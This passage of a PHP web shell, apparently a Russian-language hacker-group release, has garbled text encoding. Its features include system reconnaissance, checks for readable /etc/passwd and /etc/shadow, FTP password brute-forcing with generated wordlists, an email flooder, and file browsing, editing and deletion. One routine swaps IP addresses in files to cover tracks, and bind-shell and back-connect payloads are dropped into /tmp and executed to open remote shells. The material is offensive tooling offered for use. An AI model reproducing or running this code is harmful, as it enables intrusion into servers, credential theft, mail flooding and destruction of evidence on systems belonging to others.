+HTML; +// يèêàêàے ïًîâهًêà يه نهëàهٍ?, ?çà÷ه?? =) +if (isset($submit)) +{ + +mail($tomailz,$mailtema,$mailtext,"From: $frommail"); +echo "<h2>رîîلùهيè?îٍïًàâëهيî !</h2>"; +} +break; + + +// بيôîًىàِ? ?ٌèٌٍهى?case "info": +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "<font color=\"red\">آêë‏÷هيî</font>"; +} +else {$safemode = false; $hsafemode = "خٍêë‏÷هي?/font>";} +/* display information */ +echo "<b>[ بيôîًىàِ? 
?ٌèٌٍهى?]</b><br>"; +echo "<b>صîٌٍ:</b> ".$_SERVER["HTTP_HOST"]."<br>" ; +echo "<b>IP ٌهًâهً?</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>"; +echo " <b>رهًâهً: </b>".$_SERVER['SERVER_SIGNATURE']." "; +echo "<b>OC:</b> ".exec("uname -a")."("; +print "".php_uname()." )<br>\n"; +echo "<b>Safe-Mode: ".$hsafemode."</b><br>"; +echo "<b>دًèâèëهمèè: </b>".exec("id")."<br>"; +echo "<b>آٌهم?ىهٌٍ? </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb. " . "<b>رâîلîنيî: </b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb. <br>"; +echo "<b>زهêَùè?êàٍàëî?</b>".exec("pwd").""; +echo " <br><b>زهêَّè?web ïٍَü: </b>".@$_SERVER['PHP_SELF']." "; +echo "<br><b>زâîé IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>"; +echo "<b>PHP version : </b>".phpversion()."<BR>"; +echo "<b> ID âëàنهëüِ?ïًîِهٌ?: </b>".get_current_user()."<BR>"; +echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>"; +if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){ +print '<b>إٌٍü نîٌٍَï ?/etc/passwd ! </b><br>'; +} +if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){ +print '<b>إٌٍü نîٌٍَï ?/etc/shadow !</b> <br>'; +} +if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){ +print '<b>إٌٍü نîٌٍَï ?/etc/shadow- !</b> '; +} +if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){ +print '<b>إٌٍü نîٌٍَï ?/etc/master.passwd ! </b><br>'; +} +if(isset($_POST['th']) && $_POST['th']!=''){ +chdir($_POST['th']); +}; +if(is_writable('/tmp/')){ +$fp=fopen('/tmp/qq8',"w+"); +fclose($fp); +print "/tmp - îٍêًûٍ?nbsp;<br>\n"; +unlink('/tmp/qq8'); +} +else{ +print "<font color=red>/tmp - يه îٍêًûٍ?/font><br>"; +} +echo "<b>ءهçîïàٌيûé ًهوè? 
".$hsafemode."</b><br>"; +if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + $num = $nixpasswd + $nixpwdperpage; + echo "<b>*nix /etc/passwd:</b><br>"; + $i = $nixpasswd; + while ($i < $num) + { + $uid = posix_getpwuid($i); + if ($uid) {echo join(":",$uid)."<br>";} + $i++; + } + } + else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";} + if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>تîيôèمَيàِ? Apache (httpd.conf)</b></u></a></b><br>";} + { echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>تîيôèمَيàِ? Apache (httpd.conf)</b></u></a></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>تîيôèمَيàِ? Apache (httpd.conf)</b></u></a></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log </b></u></a></b><br>";} + break; + +// ?ٌêًèïٍ?case "about": + +echo "<center><b>دًèâهٍ âٌهى</b></center>دهًه?âàىè ïهًâ? âهًٌ? ىîهم?ٌêًèïٍ?َنàëهييîمî àنىèيèًٌٍèًîâàيèے.<b>(0.5a)</b> <br>رêًèïٍ يàُîنèٌٍے ?ٌٍàنèè ٍهٌٍèًîâàي?, ٍà? ÷ٍ?هٌëè يàéنهٍ?êàêè?ٍî لàمè, îلًàùàéٍهٌ?ٌ‏نà:<br><a href='http://ru24-team.net/forum/'>http://ru24-team.net/forum/</a> èë?<a href=mailto:dreamerz@mail.ru>يà ىûëî dreamerz@mail.ru</a>, èë?يà <a href=http://dreamerz.cc>dreamerz.cc</a>, èë?يà ICQ: <b>817312</b><br>تٍ?ُî÷ه?ïîَ÷àٌٍâîâàٍ??ًàçًàلîٍêه ٌêًèïٍ?- ïèّèٍه, ïîêàçَéٍ?÷ٍ?âû ىîوهٍه نîلàâèٍü ?èٌïًàâèٍ?..<br>حَ, ?ٌïàٌèل?‎ٍèى ë‏?? 
Terabyte, 1dt_wolf, xoce, FUF, dodbob, Nitrex ... ?ىيîمèى نًَمèى ..."; +echo "<br> ?èٌïîëüçَے ‎ٍîٍ ٌêًèïٍ يà ÷َوè?ٌهًâهًàُ âû يàًَّàهٍ?çàêî?:) زà?÷ٍ?îٌٍîًîويهه. "; + +echo "<br><br><br>حîâàے âهًٌ? ëهوè?çنهٌ? <a href=http://ru24-team.net/releases/nr.rar>http://ru24-team.net/releases/nr.rar</a> +<br><br><center><b>------------------------------->>> Ru24 - TEAM NRWS RELEASE 0.5.a [DreAmeRz] <<<-----------------------------------</b></center>"; +break; +// شز?ïîنلîً ïàًîëه?case "ftppass": + +$filename="/etc/passwd"; // passwd file +$ftp_server="localhost"; // FTP-server + +echo "FTP-server: <b>$ftp_server</b> <br><br>"; + +$fp = fopen ($filename, "r"); +if ($fp) +{ +while (!feof ($fp)) { +$buf = fgets($fp, 100); +ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); +$ftp_user_name=$g[1]; +$ftp_user_pass=$g[1]; +$conn_id=ftp_connect($ftp_server); +$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass); + +if (($conn_id) && ($login_result)) { +echo "<b>دîنêë‏÷هيè? login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>"; +ftp_close($conn_id);} +else { +echo $ftp_user_name." 
- error<br>"; +} +}} +break; + +case "ftp": + +echo " + <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center> + <form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle> + <b><a href=?ac=ftppass>دًîâهًèٍ?يà ٌâےçê?login\password</a></b> +</td></tr> + +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='host' size=50></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='login' size=50></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;تîëëè÷هٌٍâ?ïàًîëه?</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='chislo' size=10> <1000 pass </td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;دàًîëü نëے ïًîâهًêè:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='proverka' size=50> +<input type='submit' value='Brut FTP' class=button1 $style_button><br><b>ثî?ٌîًُàيےهٍ? 
?pass.txt</b></td></tr> + + + + </form></table>"; + + +function s() { + $word="qwrtypsdfghjklzxcvbnm"; + return $word[mt_rand(0,strlen($word)-1)]; +} + +function g() { + $word="euioam"; + return $word[mt_rand(0,strlen($word)-2)]; +} + +function name0() { return s().g().s(); } +function name1() { return s().g().s().g(); } +function name2() { return s().g().g().s(); } +function name3() { return s().s().g().s().g(); } +function name4() { return g().s().g().s().g(); } +function name5() { return g().g().s().g().s(); } +function name6() { return g().s().s().g().s(); } +function name7() { return s().g().g().s().g(); } +function name8() { return s().g().s().g().g(); } +function name9() { return s().g().s().g().s().g(); } +function name10() { return s().g().s().s().g().s().s(); } +function name11() { return s().g().s().s().g().s().s().g(); } + +$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005); +$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker'); + +function randword() { + global $cool; + $func="name".mt_rand(0,11); + $func2="name".mt_rand(0,11); + switch (mt_rand(0,11)) { + case 0: return $func().mt_rand(5,99); + case 1: return $func()."-".$func2(); + case 2: return $func().$cool[mt_rand(0,count($cool)-1)]; + case 3: return $func()."!".$func(); + case 4: return randpass(mt_rand(5,12)); + default: return $func(); + } + + +} + +function randpass($len) { + $word="qwertyuiopasdfghjklzxcvbnm1234567890"; + $s=""; + for ($i=0; $i<$len; $i++) { + $s.=$word[mt_rand(0,strlen($word)-1)]; + } + return $s; +} +if (@unlink("pass.txt") < 0){ +echo 
"يهٍَ يè÷همî"; +exit; +} +$file="pass.txt"; +if($file && $host && $login){ + $cn=mt_rand(30,30); +for ($i=0; $i<$cn; $i++) { + $s=$cool2[$i]; + $f=@fopen(pass.".txt","a+"); + fputs($f,"$s\n"); + } + + $cnt2=mt_rand(43,43); +for ($i=0; $i<$cnt2; $i++) { + $r=$cool[$i]; + $f=@fopen(pass.".txt","a+"); + fputs($f,"$login$r\n"); +} +$p="$proverka"; + $f=@fopen(pass.".txt","a+"); + fputs($f,"$p\n"); + + $cnt3=mt_rand($chislo,$chislo); + for ($i=0; $i<$cnt3; $i++) { + $u=randword(); + $f=@fopen(pass.".txt","a+"); + fputs($f,"$u\n"); + } + + if(is_file($file)){ + $passwd=file($file,1000); + for($i=0; $i<count($passwd); $i++){ + $stop=false; + $password=trim($passwd[$i]); + $open_ftp=@fsockopen($host,21); + if($open_ftp!=false){ + fputs($open_ftp,"user $login\n"); + fputs($open_ftp,"pass $password\n"); + while(!feof($open_ftp) && $stop!=true){ + $text=fgets($open_ftp,4096); + if(preg_match("/230/",$text)){ + $stop=true; + $f=@fopen($host._ftp,"a+"); + fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n "); + + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center> +<tr><td align=center class=pagetitle><b><font color=\"blue\">دîçنًàâëے?!! دàًîëü ïîنîلًàي.</font></b><br> +&nbsp;&nbsp;تîيهêٍ: <b>$host</b><br>&nbsp;&nbsp;ثîمè? <b>$login</b><br>&nbsp;&nbsp;دàًîëü: <b>$password</b></td></tr></table> +";exit; + } + elseif(preg_match("/530/",$text)){ + $stop=true; + + } + } + fclose($open_ftp); + }else{ + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center> +<tr><td align=center class=pagetitle bgcolor=#FF0000><b>حه âهًي?َêàçàي?ôٍ?ُîٌٍèيمà!!! 
حà <b><u>$host</u></b> çàêًûٍ 21 ïîًٍ</b></b></td></tr> +</table> +";exit; + } + } + } +} + + +break; +// SQL Attack +case "sql": + +break; + + + + + + +// MailFlud +case "mailfluder": + +$email=$_POST['email']; // جûëî وهًٍâû +$from=$_POST['from']; // جûëî وهًٍâû +$num=$_POST['num']; // ×èٌë?ïèٌه?$text=$_POST['text']; // زهêٌ?ôëَن?$kb=$_POST['kb']; // آه?ïèٌüىà (kb) +?> +<script language="JavaScript"><!-- +function reset_form() { +document.forms[0].elements[0].value=""; +document.forms[0].elements[1].value=""; +document.forms[0].elements[2].value=""; +document.forms[0].elements[3].value=""; +document.forms[0].elements[4].value=""; +} +//--></script> +<?php +if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) { + +$num_text=strlen($text)+1; // خïًهنه?هٍ نëèييَ ٍهêٌٍà + 1 (ïًîلهë ?êîيِ? +$num_kb=(1024/$num_text)*$kb; +$num_kb=ceil($num_kb); + +for ($i=1; $i<=$num_kb; $i++) { +$msg=$msg.$text." "; +} + +for ($i=1; $i<=$num; $i++) { +mail($email, $text, $msg, "From: $from"); +} + +$all_kb=$num*$kb; + +echo <<<EOF +<p align="center">ئهًٍâà: <b>$email</b><br> +تî?âî ïèٌه? <b>$num</b><br> +خلùè?ïîٌëàييû?îلْه? 
<b>$all_kb kb</b><br></p> +EOF; + +} + +else { + +echo <<<EOF +<form action="?ac=mailfluder" method="post"> +<table align="center" border="0" bordercolor="#000000"> +<tr><td>جûëî وهًٍâû</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr> +<tr><td>خٍ ىûëà</td><td><input type="text" name="from" value="sypport@mail.com" size="25"></td></tr> +<tr><td>×èٌë?ïèٌه?/td><td><input type="text" name="num" value="5" size="25"></td></tr> +<tr><td>زهêٌ?ôëَن?/td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr> +<tr><td>آه?ïèٌüىà (kb)</td><td><input type="text" name="kb" value="10" size="25"></td></tr> +<tr><td colspan="2" align="center"><input type="submit">&nbsp;&nbsp;<input type="button" onclick="reset_form()" value="Reset"></td></tr> +</table> +</form> +EOF; + +} +break; + +case "tar": +# àًُèâàِèے نèًهêٍîًèè +$fullpath = $d."/".$tar; +/* çàنàهى ًàينîىيû?يàçâàي? ôàéëîâ àًُèâàِè?/ +$CHARS = "abcdefghijklmnopqrstuvwxyz"; +for ($i=0; $i<6; $i++) $charsname .= $CHARS[rand(0,strlen($CHARS)-1)]; + echo "<br> +تàٍàëî?<u><b>$fullpath</b></u> ".exec("tar -zc $fullpath -f $charsname.tar.gz")."َïàêîâàي ?ôàéë <u>$charsname.tar.gz</u>"; + + + +echo " + +<form action='?ac=tar' method='post'> +<tr><td align=center colspan=2 class=pagetitle><b>ہًُèâàِèے <u>$name.tar.gz</u>:</b></td></tr> +<tr> +<td valign=top><input type=text name=archive size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td> +<td valign=top><input type=submit value='ؤàâè'></td> +</tr></form>"; + +exec($archive); + +break; + + +// حàâèمàِèے +case "navigation": + // دîّë?يàâèمàِèے +$mymenu = " [<a href='$php_self?ac=navigation&d=$d&e=$e&delete=1'>سنàëèٍ?/a>] [<a href='$php_self?ac=navigation&d=$d&ef=$e&edit=1'>ذهنàêٍèًîâàٍ?/a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&clean=1'>خ÷èٌٍèٍü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&replace=1'>اàىهيèٍü ٍهêٌ?/a>] [<a href='$php_self?ac=navigation&d=$d&download=$e'>اàمًَçèٍ?/a>] [<a 
href='$php_self?ac=navigation&d=$d&infofile=$e'>بيôîًىàِ?</a>]<br>"; + +$images=array(".gif",".jpg",".png",".bmp",".jpeg"); +$whereme=getcwd(); +@$d=@$_GET['d']; +$copyr = "<center>"; +$php_self=@$_SERVER['PHP_SELF']; +if(@eregi("/",$whereme)){$os="unix";} +if(!isset($d)){$d=$whereme;} +$d=str_replace("\\","/",$d); + + + +$expl=explode("/",$d); +$coun=count($expl); +if($os=="unix"){echo "<a href='$php_self?ac=navigation&d=/'>/</a>";} +else{ + echo "<a href='$php_self?ac=navigation&d=$expl[0]'>$expl[0]/</a>";} +for($i=1; $i<$coun; $i++){ + @$xx.=$expl[$i]."/"; +$sls="<a href='$php_self?ac=navigation&d=$expl[0]/$xx'>$expl[$i]</a>/"; +$sls=str_replace("//","/",$sls); +$sls=str_replace("/'></a>/","/'></a>",$sls); +print $sls; +} +echo "</td></tr>"; +echo "<br><td><b>id:</b> ".@exec('id')."</td></tr"; + + +if(@$_GET['deldir']=="1"){ + +@$dir=$_GET['d']; +function deldir($d) +{ +$handle = @opendir($d); +while (false!==($ff = @readdir($handle))){ +if($ff != "." && $ff != ".."){ +if(@is_dir("$d/$ff")){ +deldir("$d/$ff"); +}else{ +@unlink("$d/$ff"); +}}} +@closedir($handle); +if(@rmdir($d)){ +@$success = true;} +return @$success; +} +$dir=@$d; +deldir($d); + +$rback=$_GET['rback']; +@$rback=explode("/",$rback); +$crb=count($rback); +for($i=0; $i<$crb-1; $i++){ + @$x.=$rback[$i]."/"; +} +echo "<br><b>تàٍàëî?َنàëهي !</b>"; +echo $copyr; +exit;} +if(@$_GET['replace']=="1"){ +$ip=@$_SERVER['REMOTE_ADDR']; +$d=$_GET['d']; +$e=$_GET['e']; +@$de=$d."/".$e; +$de=str_replace("//","/",$de); +$e=@$e; +echo $mymenu ; +echo " +رًهنٌٍâî çàىهيû:<br> +(زû ىîوه?çàىه?ٍü ë‏لî?ٍهêٌ?<br> +شàéë: $de<br> +<form method=post> +1. زâîé IP.<br> +2. 
microsoft.com IP :)<br> +اàىه?ٍü ‎ٍ?<input name=this size=30 value=$ip> ‎ٍèى <input name=bythis size=30 value=207.46.245.156> +<input type=submit name=doit value=اàىهيèٍü> +</form> +"; + +if(@$_POST['doit']){ + +$filename="$d/$e"; +$fd = @fopen ($filename, "r"); +$rpl = @fread ($fd, @filesize ($filename)); +$re=str_replace("$this","$bythis",$rpl); +$x=@fopen("$d/$e","w"); +@fwrite($x,"$re"); +echo "<br><center>$this اàىهيهيî يà $bythis<br> +[<a href='$php_self?ac=navigation&d=$d&e=$e'>دîٌىîًٍهٍü ôàéë</a>]<br><br><Br>"; + +} +echo $copyr; +exit;} + + + + +if(@$_GET['yes']=="yes"){ +$d=@$_GET['d']; $e=@$_GET['e']; +unlink($d."/".$e); +$delresult="سنàëèë $d/$e يه ïàًٌے ! <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?ac=navigation&d=$d\">"; +} +if(@$_GET['clean']=="1"){ +@$e=$_GET['e']; +$x=fopen("$d/$e","w"); +fwrite($x,""); +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=".@$e."\">"; +exit; +} + + +if(@$_GET['e']){ +$d=@$_GET['d']; +$e=@$_GET['e']; +$pinf=pathinfo($e); +if(in_array(".".@$pinf['extension'],$images)){ +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e&img=1\">"; +exit;} +$filename="$d/$e"; +$fd = @fopen ($filename, "r"); +$c = @fread ($fd, @filesize ($filename)); +$c=htmlspecialchars($c); +$de=$d."/".$e; +$de=str_replace("//","/",$de); +if(is_file($de)){ +if(!is_writable($de)){echo "<font color=red><br><b>زخثـتخ ×زإحبإ</b></font><br>";}} +echo $mymenu ; +echo " +رîنهًوèىîه ôàéë?<br> +$de +<br> +<table width=100% border=1 cellpadding=0 cellspacing=0> +<tr><td><pre> +$c + +</pre></td></tr> +</table>"; +if(@$_GET['delete']=="1"){ +$delete=$_GET['delete']; +echo " +سنàëهيèه: زû َâهًهي ?<br> +<a href=\"$php_self?ac=navigation&d=$d&e=$e&delete=".@$delete."&yes=yes\">ؤà</a> || <a href='$php_self?no=1'>حه?/a> +<br> +"; +if(@$_GET['yes']=="yes"){ +@$d=$_GET['d']; @$e=$_GET['e']; +echo $delresult; +} +if(@$_GET['no']){ +echo "<meta http-equiv=\"REFRESH\" 
content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e\"> +"; +} + + +} #end of delete +echo $copyr; +exit; +} #end of e + +if(@$_GET['edit']=="1"){ +@$d=$_GET['d']; +@$ef=$_GET['ef']; +if(is_file($d."/".$ef)){ +if(!is_writable($d."/".$ef)){echo "<font color=red><br><b>زخثـتخ ×زإحبإ</b></font><br>";}} +echo $mymenu ; +$filename="$d/$ef"; +$fd = @fopen ($filename, "r"); +$c = @fread ($fd, @filesize ($filename)); +$c=htmlspecialchars($c); +$de=$d."/".$ef; +$de=str_replace("//","/",$de); +echo " +ذهنàêٍèًîâàيèه:<br> +$de<br> +<form method=post> +<input type=HIDDEN name=filename value='$d/$ef'> +<textarea cols=143 rows=30 name=editf>$c</textarea> +<br> +<input type=submit name=save value='رîًُàيèٍ?èçىهيèے'></form><br> + +"; +if(@$_POST['save']){ +$editf=@$_POST['editf']; +$editf=stripslashes($editf); +$f=fopen($filename,"w+"); +fwrite($f,"$editf"); +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$ef\">"; +exit; +} + +exit; +} + + + +echo" +<table width=100% cellpadding=1 cellspacing=0 class=hack> +<a href='?ac=tar&d=$d' title='ہًُèâàِèے ïًîèçîéنهٍ ٍîëüêî ïً?يàëè÷è?ïًàâ çàïèٌè ?êàٍàëî?!'><b>[ہًُèâàِèے êàٍàëîمà] </b></a> +<a href='?ac=tar&as=mail&d=$d' title='دًîèٌُîنèٍ àًُèâàِèے êàٍàëîمà + îٍïًàâêà àًُèâà يà âà?e-mail ! ?ِèے يه نîٌٍَïيà ?0.5?âهًٌèè!'><b>[ہًُèâàِèے êàٍàëîمà + خٍïًàâêà يà ?mail] </b></a> +<a href='?ac=navigation&d=$d&deldir=1' title='دîëيîه َنàëهيèه êàٍàëîمà !\n رïًàّèâàٍü ïîنٍâهًونهيèے ٍه? يèêٍ?يه لَنه?:)'><b>[سنàëهيèه êàٍàëîمà] </b></a> +<tr><td bgcolor=#4d9ef0><center><b>حàçâàيèه</b></td><td bgcolor=#4d9ef0><b>ذàçىهً</b></td><td bgcolor=#4d9ef0><b>ؤîٌٍَï</b></td></tr> +"; +$dirs=array(); +$files=array(); +$dh = @opendir($d) or die("<table width=100%><tr><td><center>تàٍàëî?يه ٌَùهٌٍâَهٍ èë?نîٌٍَï ?يهىَ çàïًهùهي !</center><br>$copyr</td></tr></table>"); +while (!(($file = readdir($dh)) === false)) { +if ($file=="." 
|| $file=="..") continue; +if (@is_dir("$d/$file")) { + $dirs[]=$file; +}else{ + $files[]=$file; + } + sort($dirs); + sort($files); + +$fz=@filesize("$d/$file"); +} + +function perm($perms){ +if (($perms & 0xC000) == 0xC000) { + $info = 's'; +} elseif (($perms & 0xA000) == 0xA000) { + $info = 'l'; +} elseif (($perms & 0x8000) == 0x8000) { + $info = '-'; +} elseif (($perms & 0x6000) == 0x6000) { + $info = 'b'; +} elseif (($perms & 0x4000) == 0x4000) { + $info = 'd'; +} elseif (($perms & 0x2000) == 0x2000) { + $info = 'c'; +} elseif (($perms & 0x1000) == 0x1000) { + $info = 'p'; +} else { + $info = 'u'; +} +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 
'T' : '-')); +return $info; +} +for ($i=0;$i<sizeof($dirs);$i++) { + if ($dirs[$i] != "..") { + + +if(is_writable($dirs[$i])){$info="<font color=green><li>&nbsp;W</font>";} +else{$info="<font color=red><li>&nbsp;R</font>";} +$perms = @fileperms($d."/".$dirs[$i]); +$owner = @fileowner($d."/".$dirs[$i]); +if($os=="unix"){ +$fileownera=posix_getpwuid($owner); +$owner=$fileownera['name']; +} +$group = @filegroup($d."/".$dirs[$i]); +if($os=="unix"){ +$groupinfo = posix_getgrgid($group); +$group=$groupinfo['name']; +} +$info=perm($perms); +if($i%2){$color="#aed7ff";}else{$color="#68adf2";} +$linkd="<a href='$php_self?ac=navigation&d=$d/$dirs[$i]'>$dirs[$i]</a>"; +$linkd=str_replace("//","/",$linkd); +echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color>$info</td></tr>"; +} +} +for ($i=0;$i<sizeof($files);$i++) { +if(is_writable($files[$i])){$info="<font color=green><li>&nbsp;W</font>";} +else{$info="<font color=red><li>&nbsp;R</font>";} +$size=@filesize($d."/".$files[$i]); +$perms = @fileperms($d."/".$files[$i]); +$owner = @fileowner($d."/".$files[$i]); +if($os=="unix"){ +$fileownera=posix_getpwuid($owner); +$owner=$fileownera['name']; +} +$group = @filegroup($d."/".$files[$i]); +if($os=="unix"){ +$groupinfo = posix_getgrgid($group); +$group=$groupinfo['name']; +} +$prava=perm($perms); +if($i%2){$color="#ccccff";}else{$color="#b0b0ff";} + +if ($size < 1024){$siz=$size.' b'; +}else{ +if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{ +if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{ +if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';} +}}} +echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?ac=navigation&d=$d&e=$files[$i]'title='ؤîٌٍَï $prava. 
آëàنهëهِ $owner/$group'>$files[$i]</a></td><td bgcolor=$color>$siz</td><td bgcolor=$color>$prava</td></tr>"; +} + +echo "</table></td></tr></table>"; +break; +// سٌٍàيîâê?لهêنîً?case "backconnect": +echo "<b>سٌٍàيîâê?لهêنîً?/ îٍêًûٍèه ïîًٍ?/b>"; +echo "<form name=bind method=POST>"; +echo "<font face=Verdana size=-2>"; +echo "<b>خٍêًûٍ?ïîًٍ </b>"; +echo "<input type=text name=port size=15 value=11457>&nbsp;"; +echo "<b>دàًîëü نëے نîٌٍَï?</b>"; +echo "<input type=text name=bind_pass size=15 value=nrws>&nbsp;"; +echo "<b>بٌïîëüçîâàٍü </b>"; +echo "<select size=\"1\" name=\"use\">"; +echo "<option value=\"Perl\">Perl</option>"; +echo "<option value=\"C\">C</option>"; +echo "</select>&nbsp;"; +echo "<input type=hidden name=dir value=".$dir.">"; +echo "<input type=submit name=submit value=خٍêًûٍ?"; +echo "</font>"; +echo "</form>"; + +echo "<b>سٌٍàيîâê?لهêنîً?/ لهêêîييهêٍ</b>"; +echo "<form name=back method=POST>"; +echo "<font face=Verdana size=-2>"; +echo "<b>IP-àنًه?</b>"; +echo "<input type=text name=ip size=15 value=127.0.0.1>&nbsp;"; +echo "<b>دîًٍ </b>"; +echo "<input type=text name=port size=15 value=31337>&nbsp;"; +echo "<b>بٌïîëüçîâàٍü </b>"; +echo "<select size=\"1\" name=\"use\">"; +echo "<option value=\"Perl\">Perl</option>"; +echo "<option value=\"C\">C</option>"; +echo "</select>&nbsp;"; +echo "<input type=hidden name=dir value=".$dir.">"; +echo "<input type=submit name=submit value=آûïîëيèٍ?"; +echo "</font>"; +echo "</form>"; + + +/* port bind C */ +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + $w_file=fopen("/tmp/bd.c","ab+") or $err=1; + if($err==1) + { + echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/bd.c</div></font>"; + $err=0; + } + else + { + fputs($w_file,base64_decode($port_bind_bd_c)); + fclose($w_file); + $blah=exec("gcc -o /tmp/bd /tmp/bd.c"); + unlink("/tmp/bd.c"); + $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." 
&"; + $blah=exec($bind_string); + $_POST['cmd']="ps -aux | grep bd"; + $err=0; + } +} + +/* port bind Perl */ +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + $w_file=fopen("/tmp/bdpl","ab+") or $err=1; + if($err==1) + { + echo "<font color=red face=Fixedsys><div align=center>خّèلêà! حه ىîمَ çàïèٌàٍü ?/tmp/</div></font>"; + $err=0; + } + else + { + fputs($w_file,base64_decode($port_bind_bd_pl)); + fclose($w_file); + $bind_string="perl /tmp/bdpl ".$_POST['port']." &"; + $blah=exec($bind_string); + $_POST['cmd']="ps -aux | grep bdpl"; + $err=0; + } +} + +/* back connect Perl */ +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + $w_file=fopen("/tmp/back","ab+") or $err=1; + if($err==1) + { + echo "<font color=red face=Fixedsys><div align=center>خّèلêà! حه ىîمَ çàïèٌàٍü ?/tmp/</div></font>"; + $err=0; + } + else + { + fputs($w_file,base64_decode($back_connect)); + fclose($w_file); + $bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &"; + $blah=exec($bc_string); + $_POST['cmd']="echo \"رهé÷àٌ ٌêًèïٍ êîييهêٍèٌٍے ?".$_POST['ip']." port ".$_POST['port']." ...\""; + $err=0; + } +} + +/* back connect C */ +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + 